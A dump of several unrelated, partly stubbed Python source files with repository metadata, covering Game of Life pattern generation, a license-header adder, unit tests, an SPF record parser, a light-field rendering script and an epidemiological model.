centerxs = [cols//5, 2*cols//5, 3*cols//5, 4*cols//5]
nteams = 4
team_assignments = list(range(nteams))
random.shuffle(team_assignments)
crab_patterns = [[], [], [], []]
for i, (centerx, centery) in enumerate(itertools.product(centerxs, centerys)):
imod4 = i%4
crabcenterx = centerx + random.randint(-jitter, jitter)
crabcentery = centery + random.randint(-jitter, jitter)
crab = get_grid_pattern(
"crabstretcher",
rows,
cols,
xoffset=crabcenterx,
yoffset=crabcentery,
hflip=(random.random() < 0.5),
vflip=(random.random() < 0.5),
rotdeg=random.choice(rotdegs),
)
team_ix = team_assignments[imod4]
team_pattern = crab_patterns[team_ix]
team_pattern.append(crab)
crab_patterns[team_ix] = team_pattern
pattern_unions = [pattern_union(pl) for pl in crab_patterns]
urls = [pattern2url(pu) for pu in pattern_unions]
return tuple(urls)
def quadgaussian_fourcolor(rows, cols, seed=None):
    """Scatter four Gaussian blobs of live cells, one per quadrant/team.

    The overall live-cell density is drawn uniformly from [0.10, 0.15)
    and split evenly across the four teams; cells never overlap between
    teams.  Team-to-quadrant assignment is shuffled.

    Returns a 4-tuple of pattern URLs, one per team.
    """
    if seed is not None:
        random.seed(seed)
    # Overall density: lower bound of 0.10, upper bound of 0.15.
    density = 0.10 + random.random() * 0.05
    total_cells = rows * cols
    # Round the live-cell budget down to a multiple of four teams.
    live_total = ((total_cells * density) // 4) * 4
    live_per_team = live_total // 4
    # Variable blobbiness: a larger divisor gives a tighter blob.
    sigma_x = cols // random.randint(8, 16)
    sigma_y = rows // random.randint(8, 16)
    jitter = 5
    team_order = list(range(4))
    random.shuffle(team_order)
    quadrant_xs = [cols // 4, 3 * cols // 4]
    quadrant_ys = [rows // 4, 3 * rows // 4]
    urls = [None] * 4
    occupied = set()  # cells claimed by any team, to prevent overlap
    for quad_ix, (qx, qy) in enumerate(
        itertools.product(quadrant_xs, quadrant_ys)
    ):
        team_ix = team_order[quad_ix]
        blob_cx = qx + random.randint(-jitter, jitter)
        blob_cy = qy + random.randint(-jitter, jitter)
        team_cells = set()
        # Rejection-sample Gaussian points until the team quota is met.
        while len(team_cells) < live_per_team:
            px = int(random.gauss(blob_cx, sigma_x))
            py = int(random.gauss(blob_cy, sigma_y))
            if 0 <= px < cols and 0 <= py < rows and (px, py) not in occupied:
                team_cells.add((px, py))
                occupied.add((px, py))
        # Render the team's cells as a dot ('.') / live ('o') text grid.
        team_rows = [
            "".join("o" if (x, y) in team_cells else "." for x in range(cols))
            for y in range(rows)
        ]
        urls[team_ix] = pattern2url(team_rows)
    return tuple(urls)
#@retry_on_failure
| 27.946895 | 113 | 0.540562 |
a1e396a0fe0bfe84f4e348a5cd7eab9d9e2a1638 | 2,962 | py | Python | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | filemanipulator.py | paulkramme/mit-license-adder | 1865413c1932a3108883dc2b77c67608d56be275 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
import tempfile
import sys
import datetime
mit_license = ("""\
/*
MIT License
Copyright (c) 2016 Paul Kramme
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
""")
# Target source file is taken from the command line (Python 2 script).
filename = sys.argv[1]
#license = sys.argv[1]
print "Licenseadder by Paul Kramme"
# Prepend the MIT license header at line 0 of the target file.
# FileModifier is defined elsewhere in this file.
with FileModifier(filename) as fp:
    fp.writeline(mit_license, 0)
| 32.911111 | 89 | 0.668467 |
a1e520db04d481d770fcb8c7ed4dbac6d857ce44 | 4,048 | py | Python | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | ve/unit/test_list_scalar.py | aneels3/pyvsc | 692fa2baa9cc0251411b3a8ace2854b7e65c288a | [
"Apache-2.0"
] | null | null | null | '''
Created on Jun 21, 2020
@author: ballance
'''
import vsc
from vsc_test_case import VscTestCase
from vsc.visitors.model_pretty_printer import ModelPrettyPrinter
| 27.726027 | 68 | 0.447381 |
a1e5a8c1e742d2b35abb789d741addea637b7ba0 | 5,344 | py | Python | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | 2 | 2017-11-21T11:16:44.000Z | 2022-01-05T23:17:50.000Z | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | 14 | 2017-10-17T16:05:39.000Z | 2022-02-12T02:42:49.000Z | config-server/test.py | wtsi-hgi/webhook-router | a36987055ec4c1bcb443d391807c6469e3d21ba8 | [
"MIT"
] | null | null | null | import json
from configserver import ConfigServer, get_postgres_db
from configserver.errors import InvalidRouteUUIDError
from flask.testing import FlaskClient
import pytest
from peewee import SqliteDatabase
import logging
from uuid import uuid4
import functools
from typing import Iterable
def test_create_route(router_app: FlaskClient):
    """Creating a route with a valid payload returns 201 Created."""
    payload = {"name": "route", "destination": "http://127.0.0.1"}
    response = router_app.post(
        "/create-route",
        data=json.dumps(payload),
        content_type="application/json",
    )
    assert response.status_code == 201
def test_get(router_app: FlaskClient, test_route_uuid: str):
    """Fetching an existing route by UUID returns 200 OK."""
    response = router_app.get(f"/routes/{test_route_uuid}")
    assert response.status_code == 200
def test_get_by_token(router_app: FlaskClient, test_route_uuid: str):
    """A route is also retrievable via its token lookup endpoint."""
    route = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)
    token = route["token"]
    response = router_app.get(f"/routes/token/{token}")
    assert response.status_code == 200
def test_patch(router_app: FlaskClient, test_route_uuid: str):
    """PATCHing a route renames it, and the new name is persisted."""
    response = router_app.patch(
        f"/routes/{test_route_uuid}",
        data=json.dumps({"name": "new-name"}),
        content_type="application/json",
    )
    assert response.status_code == 204
    fetched = json.loads(router_app.get(f"/routes/{test_route_uuid}").data)
    assert fetched["name"] == "new-name"
| 31.621302 | 94 | 0.691804 |
a1e5ccbd0c595e22be2f8bf21bf5897f8d70355d | 1,318 | py | Python | Scripts/spliter.py | sawa25/PDFs-TextExtract | bdc4469deab8b023135165ce8dbc63577927a508 | [
"MIT"
] | 87 | 2020-05-08T00:04:17.000Z | 2022-03-27T11:39:04.000Z | Scripts/spliter.py | tzo13123/PDFs-TextExtract | 3d00b7b4007557e1467fb5aca8bf8e37513de124 | [
"MIT"
] | 5 | 2020-06-24T13:22:37.000Z | 2021-04-10T21:39:32.000Z | Scripts/spliter.py | tzo13123/PDFs-TextExtract | 3d00b7b4007557e1467fb5aca8bf8e37513de124 | [
"MIT"
] | 49 | 2020-05-08T00:08:01.000Z | 2022-02-04T21:04:03.000Z | import os
from PyPDF2 import PdfFileReader, PdfFileWriter
#Solution based in two functions:
#1.pdf remove : Remove existed pdf documents(result for your last split operation)
#2.pdf splitter : Split your main pdf document into group of documents.
if __name__ == '__main__':
    # Entry point: clear the results of the previous split, then re-split
    # the merged PDF into individual documents.
    path = '../PDFs-TextExtract/pdf_merged.pdf' # Specify your main PDF document path.
    fname = os.listdir('../PDFs-TextExtract/split/') # fname: list of PDF file names already in the split folder.
    length = len(fname) # Number of documents produced by the last split.
    # Remove the PDFs produced by the last split operation
    # (pdf_remove is defined elsewhere in this file).
    pdf_remove(length)
    # Split the main PDF document into a group of documents
    # (pdf_splitter is defined elsewhere in this file).
    pdf_splitter(path)
| 32.95 | 107 | 0.69044 |
a1e6051e4e110799735dcb4615879dd95634d238 | 107 | py | Python | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | swagger_client/apis/__init__.py | sendx/sendx-api-python | edce9755d3718efb12cb5493da7cbac961cb1d9b | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
# import apis into api package
from .contact_api import ContactApi
| 21.4 | 38 | 0.841121 |
a1e9308fe3ee5db7d2721276c33a44e2c57e6e80 | 3,915 | py | Python | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | strategy/overreact_strategy.py | tseng1026/SideProject-Investment | e7135e667cdee16d1d754ca0f9ebd88226083e66 | [
"MIT"
] | null | null | null | from typing import Callable
import numpy as np
from constants.constants import IndicatorType
from strategy.base import BaseStrategy
| 35.590909 | 78 | 0.585951 |
a1ed273b2e4ad00a56a2ecb5eabb664805ce9cd8 | 12,746 | py | Python | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 8 | 2019-09-27T05:59:06.000Z | 2022-01-16T21:04:04.000Z | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 18 | 2020-10-05T19:23:59.000Z | 2022-02-22T11:39:22.000Z | src/erpbrasil/edoc/provedores/issnet.py | Engenere/erpbrasil.edoc | 2e835cc191407a8261c6f27933b7660d74b5a691 | [
"MIT"
] | 10 | 2019-11-28T14:03:02.000Z | 2022-02-25T14:06:14.000Z | # coding=utf-8
# Copyright (C) 2020 - TODAY, Marcel Savegnago - Escodoo
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import xml.etree.ElementTree as ET
from datetime import datetime
from erpbrasil.base import misc
from erpbrasil.edoc.nfse import NFSe
from erpbrasil.edoc.nfse import ServicoNFSe
# Import the ISSNet v1.00 service bindings if the optional `nfselib`
# dependency is installed; otherwise disable this provider gracefully.
try:
    from nfselib.issnet.v1_00 import servico_cancelar_nfse_envio
    from nfselib.issnet.v1_00 import servico_consultar_lote_rps_envio
    from nfselib.issnet.v1_00 import servico_consultar_lote_rps_resposta
    from nfselib.issnet.v1_00 import servico_consultar_nfse_rps_envio
    from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_envio
    from nfselib.issnet.v1_00 import servico_consultar_situacao_lote_rps_resposta
    from nfselib.issnet.v1_00 import servico_enviar_lote_rps_resposta
    issnet = True
except ImportError:
    issnet = False
# Map of IBGE municipality codes to the per-city subdomain used by ISSNet.
cidade = {
    3543402: 'ribeiraopreto',  # Ribeirão Preto - SP
    3301702: 'duquedecaxias',  # Duque de Caxias - RJ
}
# SOAP endpoint path, shared by every ISSNet city deployment.
endpoint = 'servicos.asmx?WSDL'
# Registry of NFSe web-service operations: each entry maps an operation
# name to (SOAP action, endpoint, response binding, signed-payload flag).
# Left empty when nfselib is not available.
if issnet:
    servicos = {
        'envia_documento': ServicoNFSe(
            'RecepcionarLoteRps',
            endpoint, servico_enviar_lote_rps_resposta, True),
        'consulta_recibo': ServicoNFSe(
            'ConsultarSituacaoLoteRPS',
            endpoint, servico_consultar_situacao_lote_rps_resposta, True),
        'consultar_lote_rps': ServicoNFSe(
            'ConsultarLoteRps',
            endpoint, servico_consultar_lote_rps_resposta, True),
        'cancela_documento': ServicoNFSe(
            'CancelarNfse',
            endpoint, servico_cancelar_nfse_envio, True),
        'consulta_nfse_rps': ServicoNFSe(
            'ConsultarNFSePorRPS',
            endpoint, servico_consultar_nfse_rps_envio, True),
    }
else:
    servicos = ()
| 40.722045 | 122 | 0.581751 |
a1ed89cc5c2446b1fe11b61f094fef9e3b0b2652 | 1,647 | py | Python | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | 3 | 2021-11-29T11:18:40.000Z | 2021-12-21T15:05:06.000Z | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | null | null | null | python/filter_MA.py | vsellemi/macroeconomic-forecasting | a5ad1b88daae084f258c0f5e5b9bd9d145934375 | [
"MIT"
] | 4 | 2021-11-29T11:18:48.000Z | 2021-12-22T01:36:59.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 14:40:40 2021
@author: victorsellemi
"""
import numpy as np
def filter_MA(Y, q=2):
    """Decompose a time series into trend and stationary components.

    Uses a centered moving-average (low-pass) filter of full width
    ``2*q + 1``.  The first and last ``q`` observations cannot be
    averaged over a full window, so they are passed through unchanged
    (the border of the series is preserved).

    Parameters
    ----------
    Y : ndarray, shape (T,) or (T, 1)
        Time-series data.
    q : int, optional
        Moving-average half window (default 2).

    Returns
    -------
    trend : ndarray, same shape as Y
        Low-frequency (trend) component of the series.
    signal : ndarray, same shape as Y
        Stationary component, ``Y - trend``.

    Raises
    ------
    ValueError
        If the series is too short for the window (T <= 2*q).
    """
    T = Y.shape[0]
    Q = 2 * q
    if T <= Q:
        raise ValueError("series length T=%d must exceed 2*q=%d" % (T, Q))
    # Border rows: identity, so the first/last q values pass through.
    P = np.zeros((T, T))
    P[:q, :q] = np.eye(q)
    P[T - q:, T - q:] = np.eye(q)
    # Interior rows: ones over each centered window of width Q+1.
    # Row q+r has ones in columns r .. r+Q (i.e. i-q .. i+q for i = q+r).
    # Built directly with offset identities instead of the original
    # O(Q*T^2) incremental-concatenation loop; the resulting matrix is
    # numerically identical.
    X = np.zeros((T, T))
    for k in range(Q + 1):
        X[q:T - q] += np.eye(T - Q, T, k=k)
    # Linear filter: borders pass through, interior averages its window.
    L = P + (1.0 / (Q + 1)) * X
    trend = L.dot(Y)
    signal = Y - trend
    return trend, signal
| 24.58209 | 105 | 0.538555 |
a1ed8f64fdb7a590a23d44e6a7e10803d5c52975 | 3,480 | py | Python | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | LightFields/xmlFiles/generateXMLFiles.py | sudarshannagesh90/OptimizationDeepLearningImageProcessing | 36ab96ce29a2403166f8f176eb84062c2db7cc6e | [
"MIT"
] | null | null | null | import xml.etree.ElementTree as etree
import xml.dom.minidom
import subprocess
import os
import imageio
import h5py
import numpy as np
# Scenes to render and a per-scene scale factor (parallel lists; the
# scale presumably makes each model fit the camera view -- TODO confirm).
filenames = ["airboat","al","alfa147","cessna","cube","diamond","dodecahedron","gourd","humanoid_quad","humanoid_tri","icosahedron","lamp","magnolia","minicooper","octahedron","power_lines","roi","sandal","shuttle","skyscraper","slot_machine","teapot","tetrahedron","violin_case"]
scaleVal = [0.5,0.5,0.01,0.08,0.5,0.01,0.5,0.5,0.1,0.1,0.5,0.2,0.025,0.01,0.5,0.07,0.02,0.2,0.1,0.03,0.1,0.01,0.5,0.5]
# Index of the scene currently being rendered (into both lists above).
index = 0
# Base camera position; y/z are shifted over a 5x5 grid of viewpoints
# (deltaCam apart) to sample a light field around this origin.
cameraPosOrigin = [5,1,-3]
deltaCam = 0.1
# Accumulators across all scenes: every rendered view, and separately
# the central (0, 0) view of each scene.
hr_image = []
lr_image = []
destination_path = "/home/sudarshan/git/OptimizationDeepLearningImageProcessing/LightFields/h5Files/"
dataset_name = "generatedLightFields"
for filename in filenames:
    HRindex = 0
    # Collect the 25 views of this scene into an animated GIF preview.
    with imageio.get_writer(filename+"/"+filename+".gif", mode='I') as writer:
        for indx in range(-2,3):
            for indy in range(-2,3):
                cwd = os.getcwd()
                directory = cwd+"/"+filename+"/"
                if not os.path.exists(directory):
                    os.makedirs(directory)
                # Offset the camera in the y/z plane for this grid position.
                cameraPos = [5, cameraPosOrigin[1]+indx*deltaCam,cameraPosOrigin[2]+indy*deltaCam]
                # Build the renderer scene description
                # (createXMLstring is defined elsewhere in this file).
                XMLstring = createXMLstring(filename,str(scaleVal[index]),str(cameraPos[1]),str(cameraPos[2]))
                with open(directory+filename+str(indx)+str(indy)+".xml", "w") as cube_xml:
                    cube_xml.write(XMLstring)
                # Render the scene with the Mitsuba command-line renderer.
                cmd = ["mitsuba", filename+"/"+filename+str(indx)+str(indy)+".xml"]
                cmd_out = subprocess.check_output(cmd)
                image = imageio.imread(filename+"/"+filename+str(indx)+str(indy)+".png")
                hr_image.append(np.asarray(image))
                HRindex = HRindex+1
                # The central view doubles as the per-scene input sample.
                if indx == 0 and indy == 0:
                    lr_image.append(np.asarray(image))
                writer.append_data(image)
    print(["Completed index: "+str(index)])
    index = index+1
# Pack the collected views into an HDF5 training set
# (create_h5 is defined elsewhere in this file).
# NOTE(review): dataset_name+"training.h5" yields
# "generatedLightFieldstraining.h5" -- missing separator? Confirm intent.
create_h5(data = lr_image, label = hr_image, path = destination_path, file_name = dataset_name+"training.h5")
print("data of length ", len(lr_image), "and label of length ", len(hr_image))
a1ee7d9e488784cc542ed9f4aaf3c9cd7f803d7f | 3,001 | py | Python | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 30 | 2017-07-21T19:05:07.000Z | 2022-01-14T16:24:53.000Z | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 50 | 2017-11-20T16:43:05.000Z | 2022-03-02T21:37:45.000Z | _old/test.py | DanielRabl/libtw2 | ebcc833aa418e0ee25ff1da2881f7102dc7efa5d | [
"Apache-2.0",
"MIT"
] | 12 | 2017-07-21T19:05:10.000Z | 2021-04-09T20:22:58.000Z | import datafile
from collections import defaultdict
#struct CMapItemImage_v1
#{
# int m_Version;
# int m_Width;
# int m_Height;
# int m_External;
# int m_ImageName;
# int m_ImageData;
#} ;
#struct CMapItemImage : public CMapItemImage_v1
#{
# enum { CURRENT_VERSION=2 };
# int m_Format;
#};
if __name__ == '__main__':
    import sys
    # Delegate to main() (defined elsewhere in this file) and propagate
    # its return value as the process exit code.
    sys.exit(main())
| 25.008333 | 104 | 0.673775 |
a1ee7de4317afbc181dee20858eea2b69d2fac4c | 5,414 | py | Python | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | tests/test_rotate_3dmarkers.py | CRBS/etspecutil | d0b42730545cbf04e0cb222a40845e19ff9ee3f0 | [
"OLDAP-2.6",
"Python-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_rotate_3dmarkers
----------------------------------
Tests for `rotate_3dmarkers` module.
"""
import sys
import unittest
import os.path
import tempfile
import shutil
import logging
from etspecutil.marker import MarkersList
from etspecutil.marker import MarkersFrom3DMarkersFileFactory
from etspecutil import rotate_3dmarkers
from etspecutil.rotate_3dmarkers import Parameters
if __name__ == '__main__':
    # Run this module's unittest cases when executed as a script.
    sys.exit(unittest.main())
| 35.155844 | 76 | 0.579424 |
a1efd6d129721046eb1d2381c5f7945eeeb81f90 | 431 | py | Python | tests/conftest.py | asvetlov/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 24 | 2016-12-25T16:24:45.000Z | 2020-04-07T14:39:28.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 168 | 2016-11-12T20:50:34.000Z | 2022-03-18T02:09:08.000Z | tests/conftest.py | jettify/aiohttp_mako | 8fb66bd35b8cb4a2fa91e33f3dff918e4798a15a | [
"Apache-2.0"
] | 9 | 2016-12-13T10:48:26.000Z | 2020-09-17T10:42:40.000Z | import sys
import pytest
import aiohttp_mako
from aiohttp import web
| 22.684211 | 64 | 0.584687 |
a1f3d906821dbcf88254a5e1e8e69f73b13693e7 | 3,583 | py | Python | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | CraftMasterGame/src/enemy.py | Athelios/CraftMaster | 636cc60681d3199b3ae685690ee427fe81672541 | [
"MIT"
] | null | null | null | from npc import *
import math
from pyglet import image
from pyglet.graphics import TextureGroup
import os
import json
| 42.654762 | 155 | 0.568518 |
a1f67693d5e8c244c0eda84f1334ad34e26d18f3 | 754 | py | Python | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | 1 | 2021-07-12T12:55:27.000Z | 2021-07-12T12:55:27.000Z | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | null | null | null | goldsrc/mdl/structs/bodypart.py | half5life/SourceIO | f3dc6db92daa537acbb487ce09f371866f6e3e7f | [
"MIT"
] | null | null | null | from typing import List
from .model import StudioModel
from ....source_shared.base import Base
from ....utilities.byte_io_mdl import ByteIO
| 30.16 | 80 | 0.619363 |
a1f747225cd20292d907c35e437ba676e03d1874 | 511 | py | Python | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | app/core/auth.py | oxfn/owtest | f4eeae225ef67684d96edd5708c44a0fd639d037 | [
"Unlicense"
] | null | null | null | from fastapi import Depends
from fastapi.exceptions import HTTPException
from fastapi.security import OAuth2PasswordBearer
from app.models.users import User, UserRepository
# FastAPI dependency that extracts the OAuth2 bearer token from the
# Authorization header; tokens are issued by the /login endpoint.
get_token = OAuth2PasswordBearer(tokenUrl="/login")
| 28.388889 | 70 | 0.749511 |
a1f94bf8941a2359311bcdccf3b7596591d7d459 | 1,449 | py | Python | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/4471462/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | #!/usr/bin/env python
#
# Author: Fred C.
# Email:
#
from __future__ import print_function
from collections import defaultdict
import sys
import DNS
import re
# Matches SPF mechanisms of interest: ip4/ip6 address literals plus
# include/redirect directives; the value is captured in group 2.
RE_PARSE = re.compile(r'(ip4|ip6|include|redirect)[:=](.*)', re.IGNORECASE)
# Safety cap on nested include/redirect lookups.
MAX_RECURSION = 5
if __name__ == '__main__':
    # Build a whitelist of addresses from the entries listed (one per
    # line) in the input file, then print them sorted.  process() is
    # defined elsewhere in this file.
    whitelist = set()
    with open(sys.argv[1]) as fd:
        for line in fd:
            line = line.strip()
            for ip in process(line):
                whitelist.add(ip)
    for ip in sorted(whitelist):
        print(ip)
| 21.308824 | 75 | 0.63285 |
a1f99eeded3cabb05a888e2acb13ce873a05d09f | 895 | bzl | Python | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null | tools/build_rules/cc_resources.bzl | justbuchanan/kythe | 91da8b42354cd3b6818be5a9bf4389fd144ff6e5 | [
"Apache-2.0"
] | null | null | null |
# Returns the generated files directory root.
#
# Note: workaround for https://github.com/bazelbuild/bazel/issues/4463.
| 34.423077 | 79 | 0.484916 |
a1fa4d83464708be7267466fae9107d6a82954d1 | 32,249 | py | Python | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 37 | 2020-03-28T16:36:56.000Z | 2021-11-16T11:34:55.000Z | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 1 | 2020-05-29T16:39:03.000Z | 2020-06-01T19:29:55.000Z | modelling/model_seiihurd_matrices.py | lhunlindeion/Mathematical-and-Statistical-Modeling-of-COVID19-in-Brazil | 164f19fcf04fe391aa7515fe436c63c6534fa89c | [
"MIT"
] | 9 | 2020-03-28T00:00:16.000Z | 2021-02-19T14:41:47.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 19 18:08:01 2020
@author: Felipe A. C. Pereira
Implementação do ajuste do modelo SEIIHURD com separação de grupos. Necessita
de mais verificações e funções para simplificar o input. Baseado nas classes
disponíveis no modelos.py
"""
import numpy as np
from functools import reduce
import scipy.integrate as spi
from scipy.optimize import least_squares
from platypus import NSGAII, Problem, Real
from pyswarms.single.global_best import GlobalBestPSO
import pyswarms as ps
from pyswarms.backend.topology import Star
from pyswarms.utils.plotters import plot_cost_history
from itertools import repeat
import multiprocessing as mp
import copy
import joblib
'''
Social contact matrices from
PREM, Kiesha; COOK, Alex R.; JIT, Mark. Projecting social contact matrices in
152 countries using contact surveys and demographic data. PLoS computational
biology, v. 13, n. 9, p. e1005697, 2017.
'''
ages_Mu_min = 5 * np.arange(16)
Mu_house = np.array([[0.47868515, 0.50507561, 0.29848922, 0.15763748, 0.26276959,
0.40185462, 0.46855027, 0.42581354, 0.2150961 , 0.0856771 ,
0.08705463, 0.07551931, 0.05129175, 0.02344832, 0.00793644,
0.01072846],
[0.35580205, 0.77874482, 0.51392686, 0.21151069, 0.08597966,
0.28306027, 0.49982218, 0.52854893, 0.41220947, 0.15848728,
0.07491245, 0.07658339, 0.04772343, 0.02588962, 0.01125956,
0.01073152],
[0.25903114, 0.63488713, 1.36175618, 0.50016515, 0.11748191,
0.10264613, 0.24113458, 0.47274372, 0.54026417, 0.26708819,
0.11007723, 0.04406045, 0.02746409, 0.02825033, 0.02044872,
0.01214665],
[0.14223192, 0.24383932, 0.53761638, 1.05325205, 0.28778496,
0.10925453, 0.0651564 , 0.2432454 , 0.39011334, 0.41381277,
0.23194909, 0.07541471, 0.03428398, 0.02122257, 0.01033573,
0.00864859],
[0.27381886, 0.15430529, 0.16053062, 0.5104134 , 0.95175366,
0.3586594 , 0.09248672, 0.04774269, 0.15814197, 0.36581739,
0.25544811, 0.13338965, 0.03461345, 0.01062458, 0.00844199,
0.00868782],
[0.59409802, 0.26971847, 0.10669146, 0.18330524, 0.39561893,
0.81955947, 0.26376865, 0.06604084, 0.03824556, 0.11560004,
0.23218163, 0.15331788, 0.07336147, 0.02312255, 0.00412646,
0.01025778],
[0.63860889, 0.75760606, 0.43109156, 0.09913293, 0.13935789,
0.32056062, 0.65710277, 0.25488454, 0.1062129 , 0.0430932 ,
0.06880784, 0.09938458, 0.09010691, 0.02233902, 0.01155556,
0.00695246],
[0.56209348, 0.87334544, 0.75598244, 0.33199136, 0.07233271,
0.08674171, 0.20243583, 0.60062714, 0.17793601, 0.06307045,
0.04445926, 0.04082447, 0.06275133, 0.04051762, 0.01712777,
0.00598721],
[0.35751289, 0.66234582, 0.77180208, 0.54993616, 0.17368099,
0.07361914, 0.13016852, 0.19937327, 0.46551558, 0.15412263,
0.06123041, 0.0182514 , 0.04234381, 0.04312892, 0.01656267,
0.01175358],
[0.208131 , 0.41591452, 0.56510014, 0.67760241, 0.38146504,
0.14185001, 0.06160354, 0.12945701, 0.16470166, 0.41150841,
0.14596804, 0.04404807, 0.02395316, 0.01731295, 0.01469059,
0.02275339],
[0.30472548, 0.26744442, 0.41631962, 0.46516888, 0.41751365,
0.28520772, 0.13931619, 0.07682945, 0.11404965, 0.16122096,
